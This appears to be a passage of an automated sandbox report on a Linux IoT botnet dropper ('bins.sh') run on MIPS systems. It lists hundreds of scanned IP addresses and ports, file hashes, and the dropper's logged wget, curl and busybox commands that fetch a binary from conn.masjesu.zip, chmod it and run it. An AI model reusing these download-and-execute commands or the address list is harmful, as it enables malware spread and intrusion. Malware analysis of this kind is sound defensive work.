CN 121.32.165.48:7574 tcp
FR 62.68.65.208:7574 tcp
US 70.183.110.242:7574 tcp
US 70.89.206.61:7574 tcp
US 40.123.110.153:7574 tcp
SG 43.78.129.16:7574 tcp
US 165.236.214.216:7574 tcp
US 50.115.118.1:7574 tcp
CN 1.82.128.50:7574 tcp
CA 142.82.93.247:7574 tcp
US 3.152.75.174:7574 tcp
CN 221.202.254.42:7574 tcp
IT 80.19.154.252:7574 tcp
CL 191.117.233.63:7574 tcp
KR 211.168.77.245:7574 tcp
GB 109.180.133.68:7574 tcp
US 69.79.129.120:7574 tcp
US 57.125.252.42:7574 tcp
US 96.149.194.215:7574 tcp
AU 103.192.175.157:7574 tcp
US 35.63.29.147:7574 tcp
US 206.203.220.17:7574 tcp
US 44.112.254.128:7574 tcp
US 174.174.175.234:7574 tcp
CN 42.102.62.228:7574 tcp
US 168.229.122.63:7574 tcp
ID 36.79.170.74:7574 tcp
FR 85.222.202.82:7574 tcp
US 72.67.189.181:7574 tcp
US 54.53.211.6:7574 tcp
CN 27.14.109.151:7574 tcp
CN 14.148.116.187:7574 tcp
US 32.102.69.60:7574 tcp
CN 221.11.176.194:7574 tcp
US 169.228.15.150:7574 tcp
AU 203.1.240.63:7574 tcp
BR 200.205.230.214:7574 tcp
US 69.1.2.158:7574 tcp
US 169.130.91.95:7574 tcp
US 75.137.123.129:7574 tcp
US 69.142.119.224:7574 tcp
US 12.153.80.135:7574 tcp
US 157.223.143.141:7574 tcp
US 162.102.138.228:7574 tcp
TW 180.218.146.162:7574 tcp
KW 212.43.17.7:7574 tcp
US 167.16.222.76:7574 tcp
RU 176.107.250.169:7574 tcp
AT 156.58.155.150:7574 tcp
US 184.117.24.190:7574 tcp
ID 39.230.241.27:7574 tcp
US 68.91.202.150:7574 tcp
TW 120.104.147.95:7574 tcp
KR 122.35.186.55:7574 tcp
RU 178.155.12.58:7574 tcp
CN 123.59.84.221:7574 tcp
US 17.247.199.124:7574 tcp
CN 222.26.210.56:7574 tcp
US 66.102.216.222:7574 tcp
RU 213.151.28.166:5555 tcp
US 3.82.152.41:5555 tcp
EG 45.105.207.10:7574 tcp
CN 123.197.194.234:7574 tcp
HK 156.225.167.158:7574 tcp
US 208.189.30.14:7574 tcp
US 54.25.27.65:7574 tcp
US 18.3.191.68:7574 tcp
US 157.96.246.215:7574 tcp
US 76.52.64.217:7574 tcp
US 8.80.179.141:7574 tcp
JP 126.76.48.179:5555 tcp
NL 145.210.134.181:52869 tcp
DK 2.105.79.16:8080 tcp
US 18.7.155.165:81 tcp
RU 213.151.28.166:49152 tcp
US 70.183.110.242:5555 tcp
FR 62.68.65.208:5555 tcp
NL 213.126.53.108:5555 tcp
US 40.123.110.153:5555 tcp
CN 121.32.165.48:5555 tcp
US 70.89.206.61:5555 tcp
BR 177.18.194.254:5555 tcp
US 68.165.156.81:5555 tcp
US 17.10.187.166:5555 tcp
US 64.65.229.66:5555 tcp
DE 79.193.48.79:5555 tcp
US 72.67.189.181:5555 tcp
US 174.174.175.234:5555 tcp
CN 221.202.254.42:5555 tcp
US 3.152.75.174:5555 tcp
CN 1.82.128.50:5555 tcp
CA 142.82.93.247:5555 tcp
CL 191.117.233.63:5555 tcp
ID 36.79.170.74:5555 tcp
US 35.63.29.147:5555 tcp
US 168.229.122.63:5555 tcp
US 206.203.220.17:5555 tcp
US 54.53.211.6:5555 tcp
AU 103.192.175.157:5555 tcp
FR 85.222.202.82:5555 tcp
US 96.149.194.215:5555 tcp
GB 109.180.133.68:5555 tcp
US 69.79.129.120:5555 tcp
US 165.236.214.216:5555 tcp
US 44.112.254.128:5555 tcp
US 50.115.118.1:5555 tcp
CN 14.148.116.187:5555 tcp
CN 27.14.109.151:5555 tcp
IT 80.19.154.252:5555 tcp
SG 43.78.129.16:5555 tcp
KR 211.168.77.245:5555 tcp
CN 42.102.62.228:5555 tcp
US 57.125.252.42:5555 tcp
US 167.16.222.76:5555 tcp
EG 45.105.207.10:5555 tcp
US 69.1.2.158:5555 tcp
US 32.102.69.60:5555 tcp
US 75.137.123.129:5555 tcp
US 157.223.143.141:5555 tcp
US 208.189.30.14:5555 tcp
US 169.228.15.150:5555 tcp
TW 180.218.146.162:5555 tcp
RU 176.107.250.169:5555 tcp
RU 178.155.12.58:5555 tcp
HK 156.225.167.158:5555 tcp
CN 123.197.194.234:5555 tcp
US 54.25.27.65:5555 tcp
AU 203.1.240.63:5555 tcp
US 66.102.216.222:5555 tcp
CN 221.11.176.194:5555 tcp
BR 200.205.230.214:5555 tcp
TW 120.104.147.95:5555 tcp
US 184.117.24.190:5555 tcp
AT 156.58.155.150:5555 tcp
US 17.247.199.124:5555 tcp
ID 39.230.241.27:5555 tcp
US 169.130.91.95:5555 tcp
US 3.82.152.41:49152 tcp
US 18.3.191.68:5555 tcp
US 157.96.246.215:5555 tcp
US 8.80.179.141:5555 tcp
US 69.142.119.224:5555 tcp
US 68.91.202.150:5555 tcp
US 12.153.80.135:5555 tcp
KW 212.43.17.7:5555 tcp
US 162.102.138.228:5555 tcp
CN 222.26.210.56:5555 tcp
CN 123.59.84.221:5555 tcp
KR 122.35.186.55:5555 tcp
US 76.52.64.217:5555 tcp
NL 145.210.134.181:7574 tcp
JP 126.76.48.179:49152 tcp
DK 2.105.79.16:52869 tcp
US 18.7.155.165:8080 tcp
RU 213.151.28.166:8443 tcp
US 64.65.229.66:49152 tcp
DE 79.193.48.79:49152 tcp
US 17.10.187.166:49152 tcp
BR 177.18.194.254:49152 tcp
US 40.123.110.153:49152 tcp
US 70.89.206.61:49152 tcp
CN 121.32.165.48:49152 tcp
US 68.165.156.81:49152 tcp
NL 213.126.53.108:49152 tcp
FR 62.68.65.208:49152 tcp
US 70.183.110.242:49152 tcp
US 44.112.254.128:49152 tcp
US 96.149.194.215:49152 tcp
CN 27.14.109.151:49152 tcp
FR 85.222.202.82:49152 tcp
GB 109.180.133.68:49152 tcp
US 168.229.122.63:49152 tcp
CN 14.148.116.187:49152 tcp
US 69.79.129.120:49152 tcp
US 35.63.29.147:49152 tcp
US 165.236.214.216:49152 tcp
CL 191.117.233.63:49152 tcp
CN 221.202.254.42:49152 tcp
US 174.174.175.234:49152 tcp
JP 126.76.48.179:8443 tcp
NL 145.210.134.181:5555 tcp
CN 123.197.194.234:49152 tcp
RU 176.107.250.169:49152 tcp
US 169.228.15.150:49152 tcp
US 167.16.222.76:49152 tcp
RU 178.155.12.58:49152 tcp
US 162.102.138.228:49152 tcp
US 75.137.123.129:49152 tcp
US 208.189.30.14:49152 tcp
HK 156.225.167.158:49152 tcp
TW 120.104.147.95:49152 tcp
BR 200.205.230.214:49152 tcp
US 3.82.152.41:8443 tcp
CN 221.11.176.194:49152 tcp
TW 180.218.146.162:49152 tcp
US 54.25.27.65:49152 tcp
US 68.91.202.150:49152 tcp
ID 39.230.241.27:49152 tcp
CN 222.26.210.56:49152 tcp
US 76.52.64.217:49152 tcp
US 169.130.91.95:49152 tcp
US 12.153.80.135:49152 tcp
US 8.80.179.141:49152 tcp
EG 45.105.207.10:49152 tcp
US 17.247.199.124:49152 tcp
US 69.142.119.224:49152 tcp
US 32.102.69.60:49152 tcp
US 184.117.24.190:49152 tcp
AU 203.1.240.63:49152 tcp
IT 80.19.154.252:49152 tcp
KR 211.168.77.245:49152 tcp
US 206.203.220.17:49152 tcp
CN 1.82.128.50:49152 tcp
US 66.102.216.222:49152 tcp
CN 42.102.62.228:49152 tcp
US 69.1.2.158:49152 tcp
US 18.3.191.68:49152 tcp
KR 122.35.186.55:49152 tcp
US 3.152.75.174:49152 tcp
US 157.223.143.141:49152 tcp
US 157.96.246.215:49152 tcp
CN 123.59.84.221:49152 tcp
KW 212.43.17.7:49152 tcp
ID 36.79.170.74:49152 tcp
SG 43.78.129.16:49152 tcp
AT 156.58.155.150:49152 tcp
AU 103.192.175.157:49152 tcp
US 57.125.252.42:49152 tcp
US 50.115.118.1:49152 tcp
US 72.67.189.181:49152 tcp
US 54.53.211.6:49152 tcp
CA 142.82.93.247:49152 tcp
DK 2.105.79.16:7574 tcp
US 18.7.155.165:52869 tcp
IN 171.59.82.186:37215 tcp
US 70.89.206.61:8443 tcp
US 17.10.187.166:8443 tcp
US 64.65.229.66:8443 tcp
DE 79.193.48.79:8443 tcp
BR 177.18.194.254:8443 tcp
CN 121.32.165.48:8443 tcp
US 40.123.110.153:8443 tcp
NL 213.126.53.108:8443 tcp
US 68.165.156.81:8443 tcp
FR 62.68.65.208:8443 tcp
US 70.183.110.242:8443 tcp
CN 14.148.116.187:8443 tcp
US 35.63.29.147:8443 tcp
US 69.79.129.120:8443 tcp
CL 191.117.233.63:8443 tcp
US 168.229.122.63:8443 tcp
FR 85.222.202.82:8443 tcp
GB 109.180.133.68:8443 tcp
US 174.174.175.234:8443 tcp
US 44.112.254.128:8443 tcp
CN 27.14.109.151:8443 tcp
US 165.236.214.216:8443 tcp
CN 221.202.254.42:8443 tcp
US 96.149.194.215:8443 tcp
US 3.152.75.174:8443 tcp
CN 123.197.194.234:8443 tcp
US 169.228.15.150:8443 tcp
US 76.52.64.217:8443 tcp
HK 156.225.167.158:8443 tcp
US 17.247.199.124:8443 tcp
US 66.102.216.222:8443 tcp
US 68.91.202.150:8443 tcp
AU 203.1.240.63:8443 tcp
US 18.3.191.68:8443 tcp
CN 42.102.62.228:8443 tcp
RU 178.155.12.58:8443 tcp
KR 211.168.77.245:8443 tcp
BR 200.205.230.214:8443 tcp
CN 221.11.176.194:8443 tcp
US 8.80.179.141:8443 tcp
CN 222.26.210.56:8443 tcp
US 167.16.222.76:8443 tcp
US 184.117.24.190:8443 tcp
TW 180.218.146.162:8443 tcp
US 75.137.123.129:8443 tcp
KR 122.35.186.55:8443 tcp
US 208.189.30.14:8443 tcp
EG 45.105.207.10:8443 tcp
US 12.153.80.135:8443 tcp
CN 1.82.128.50:8443 tcp
US 162.102.138.228:8443 tcp
US 69.1.2.158:8443 tcp
US 69.142.119.224:8443 tcp
ID 39.230.241.27:8443 tcp
US 54.25.27.65:8443 tcp
NL 145.210.134.181:49152 tcp
TW 120.104.147.95:8443 tcp
US 206.203.220.17:8443 tcp
US 169.130.91.95:8443 tcp
US 32.102.69.60:8443 tcp
US 157.96.246.215:8443 tcp
US 157.223.143.141:8443 tcp
RU 176.107.250.169:8443 tcp
US 57.125.252.42:8443 tcp
US 72.215.250.178:37215 tcp
CN 123.59.84.221:8443 tcp
US 72.67.189.181:8443 tcp
ID 36.79.170.74:8443 tcp
KR 222.106.219.249:37215 tcp
US 50.115.118.1:8443 tcp
SG 43.78.129.16:8443 tcp
US 54.53.211.6:8443 tcp
CA 142.82.93.247:8443 tcp
KW 212.43.17.7:8443 tcp
AT 156.58.155.150:8443 tcp
AU 103.192.175.157:8443 tcp
IT 80.19.154.252:8443 tcp
DK 2.105.79.16:5555 tcp
US 18.7.155.165:7574 tcp
IN 171.59.82.186:80 tcp
US 108.122.217.15:37215 tcp
US 161.6.151.73:37215 tcp
CH 81.6.43.148:37215 tcp
US 99.149.244.54:37215 tcp
US 167.65.125.127:37215 tcp
IT 5.98.119.62:37215 tcp
US 19.191.169.151:37215 tcp
IT 80.17.7.142:37215 tcp
JP 36.12.152.179:37215 tcp
US 15.97.191.187:37215 tcp
US 35.85.168.78:37215 tcp
US 108.122.217.15:80 tcp
AU 101.164.220.178:37215 tcp
US 97.74.148.73:37215 tcp
FR 84.4.186.110:37215 tcp
FR 79.91.200.213:37215 tcp
CN 116.185.191.243:37215 tcp
KR 221.141.222.201:37215 tcp
JP 202.230.92.131:37215 tcp
US 216.251.2.225:37215 tcp
GB 195.99.7.153:37215 tcp
US 151.119.189.144:37215 tcp
US 44.136.35.34:37215 tcp
US 157.215.158.220:37215 tcp
BR 177.21.255.107:37215 tcp
US 216.142.35.195:37215 tcp
US 34.25.76.42:37215 tcp
US 56.38.254.229:37215 tcp
CN 111.35.191.236:37215 tcp
IT 91.252.166.232:37215 tcp
KR 211.172.79.180:37215 tcp
FR 86.227.112.28:37215 tcp
US 50.50.24.234:37215 tcp
KR 202.20.176.124:37215 tcp
AU 202.171.188.226:37215 tcp
AR 181.8.238.90:37215 tcp
US 48.214.185.167:37215 tcp
CN 36.163.107.19:37215 tcp
US 171.147.37.179:37215 tcp
US 56.165.237.179:37215 tcp
US 16.193.190.63:37215 tcp
US 209.203.128.250:37215 tcp
US 207.157.33.75:37215 tcp
IT 62.196.30.19:37215 tcp
AE 109.177.135.130:37215 tcp
KR 222.106.219.249:80 tcp
US 72.215.250.178:80 tcp
US 169.93.187.199:37215 tcp
US 75.35.37.107:37215 tcp
US 9.251.180.91:37215 tcp
ZA 41.181.35.41:37215 tcp
CN 106.88.211.254:37215 tcp
FR 90.32.220.230:37215 tcp
PH 58.69.24.171:37215 tcp
CN 117.133.109.118:37215 tcp
KR 61.102.237.159:37215 tcp
CN 110.97.243.82:37215 tcp
BR 201.45.84.96:37215 tcp
US 66.60.198.143:37215 tcp
CA 173.34.247.236:37215 tcp
RO 80.96.93.112:37215 tcp
CN 111.25.25.49:37215 tcp
US 9.171.43.74:37215 tcp
BR 177.73.67.174:37215 tcp
ES 194.106.18.151:37215 tcp
US 170.23.110.239:37215 tcp
GB 90.244.65.167:37215 tcp
US 73.129.146.179:37215 tcp
MX 201.172.165.165:37215 tcp
US 16.90.226.20:37215 tcp
DK 2.105.79.16:49152 tcp
US 168.3.149.174:37215 tcp
NL 145.210.134.181:8443 tcp
US 48.73.202.179:37215 tcp
CN 119.6.213.144:37215 tcp
CN 157.156.177.163:37215 tcp
CZ 90.180.75.74:37215 tcp
CN 182.111.26.56:37215 tcp
US 166.45.87.196:37215 tcp
US 18.7.155.165:5555 tcp
IN 171.59.82.186:81 tcp
US 35.85.168.78:80 tcp
IT 80.17.7.142:80 tcp
US 161.6.151.73:80 tcp
JP 36.12.152.179:80 tcp
US 99.149.244.54:80 tcp
US 15.97.191.187:80 tcp
US 19.191.169.151:80 tcp
IT 5.98.119.62:80 tcp
CH 81.6.43.148:80 tcp
US 167.65.125.127:80 tcp
US 108.122.217.15:81 tcp
US 168.3.149.174:80 tcp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

/var/spool/cron/crontabs/tmp.nFADI4

MD5 5e8eb0b39864e53b859bcdcaeb4dbe6a
SHA1 c8116483ad132a21e500bb5087c53996ed66334c
SHA256 6f0768d965338cb7d3061fcc41810df84bd23d8978a6e186fe996b33e6ae37e7
SHA512 4338d28aba1567ee8022a74e0d80020daaeea88b4d026c36fbb9e395e7e9d4a511073e94a018afe1863248585fe7f413d09ccff177f6b41c24ff829d746a0820

Analysis: behavioral3

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

debian9-mipsbe-20240611-en

Max time kernel

139s

Max time network

151s

Command Line

[/tmp/bins.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /bin/busybox N/A
N/A N/A /usr/bin/wget N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/wget N/A
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/curl N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/busybox

[/bin/busybox wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/chmod

[chmod 777 zZM090BtLw96clc18K3325Bi3InWJUorwB]

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

[./zZM090BtLw96clc18K3325Bi3InWJUorwB]

/bin/rm

[rm zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/ywFFVVO9FFFiqIhnp3CjuvxoRt2eOTpwUG]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp
BG 87.120.125.191:80 conn.masjesu.zip tcp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f

Analysis: behavioral4

Detonation Overview

Submitted

2024-12-05 07:52

Reported

2024-12-05 07:54

Platform

debian9-mipsel-20240226-en

Max time kernel

149s

Max time network

9s

Command Line

[/tmp/bins.sh]

Signatures

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

System Network Configuration Discovery

discovery
Description Indicator Process Target
N/A N/A /usr/bin/curl N/A
N/A N/A /usr/bin/wget N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB /usr/bin/wget N/A

Processes

/tmp/bins.sh

[/tmp/bins.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

/usr/bin/curl

[curl -O http://conn.masjesu.zip/bins/zZM090BtLw96clc18K3325Bi3InWJUorwB]

Network

Country Destination Domain Proto
US 1.1.1.1:53 conn.masjesu.zip udp
US 216.126.231.240:80 conn.masjesu.zip tcp
US 1.1.1.1:53 conn.masjesu.zip udp

Files

/tmp/zZM090BtLw96clc18K3325Bi3InWJUorwB

MD5 786d75a158fe731feca3880f436082c0
SHA1 79ea2734e43d00cdeabed5586b2c1994d02aef3e
SHA256 5fb5b9beb44997a6d1baf950a8bf05b94aa59406d82ba2fea27eb13c497d4b18
SHA512 7984ebc874563267570f828ee158e4860971e184900e3590ac3b4829285443e065dd1ad4df190ceabf575880a4cd8ead4dd1132e9c1650239accf3f6440a3f7f